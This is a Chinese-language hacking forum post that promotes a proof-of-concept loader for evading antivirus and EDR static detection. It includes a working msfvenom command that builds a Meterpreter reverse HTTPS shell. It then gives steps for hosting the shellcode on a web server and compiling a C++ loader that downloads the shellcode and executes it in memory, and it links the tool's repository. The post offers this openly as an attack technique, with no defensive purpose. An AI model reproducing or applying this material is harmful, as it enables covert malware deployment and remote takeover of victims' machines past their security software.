安全矩阵

 找回密码
 立即注册
搜索
查看: 708|回复: 0

免杀!躲避 AV/EPP/EDR 静态检测

[复制链接]

102

主题

102

帖子

330

积分

中级会员

Rank: 3Rank: 3

积分
330
发表于 2023-5-16 00:29:27 | 显示全部楼层 |阅读模式
Hack分享吧 2023-05-15 08:30 发表于卢森堡
项目介绍
此 POC 使您能够编译 .exe 以完全避免 AV/EPP/EDR 对您的 C2-shellcode 进行静态检测,并下载并执行托管在您的 (C2)-web 服务器上的 C2-shellcode。


通过该 POC,我们的优势在于,C2 反向 shell 的 shellcode 不作为字符串或 .bin 文件包含在 POC 中。


这样一来,我们就不存在 AV/EPP/EDR 静态检测 C2 shellcode 的问题,因为完整的 C2-shellcode 托管在Web服务器上。
使用方法1. 使用MSF-Venom创建stageless shellcode
  1. msfvenom -p windows/x64/meterpreter_reverse_https LHOST=10.10.0.1 LPORT=443 -fc --arch x64 --platform windows -o /tmp/meterx64.c
复制代码

2. 服务器托管 MSF-stageless shellcode 的文件
根据 C++ POC 中的代码,托管的 shellcode 必须采用十六进制格式。

要将整个 MSF-shellcode 放在一行中,您可以使用 Notpad++ 中的行操作功能合并行,然后删除字符串中的非空格和双引号。




最后,您可以将带有无阶段 MSF-shellcode 的文件保存为没有任何文件类型结尾的文件,我们称之为更新,然后将 MSF-Shellcode 文件上传到您选择的Web服务器上。


3. 将 C++ POC 中的链接更改为您的 MSF-payload
我们将 POC 中的链接更改为我们托管无阶段 MSF-Shellcode 的 Web 服务器的链接,并在Visual Studio 中将其编译为 Release x64。



用 VS 编译后,你有一个 x64 二进制文件,它根本不包含任何 C2-shellcode 字符串或 .bin 文件,执行后 C2-shellcode 被下载并在目标主机的内存中执行。

目前,使用 Create Thread 执行 shellcode 是通过 WIN32 API 完成的。但是尽管不使用系统调用,POC 还是会做得很好
下载地址

  1. https://github.com/VirtualAlllocEx/Shellcode-Downloader-CreateThread-Execution
复制代码


本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有帐号?立即注册

x
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

小黑屋|安全矩阵

GMT+8, 2024-11-28 17:49 , Processed in 0.014447 second(s), 19 queries .

Powered by Discuz! X4.0

Copyright © 2001-2020, Tencent Cloud.

快速回复 返回顶部 返回列表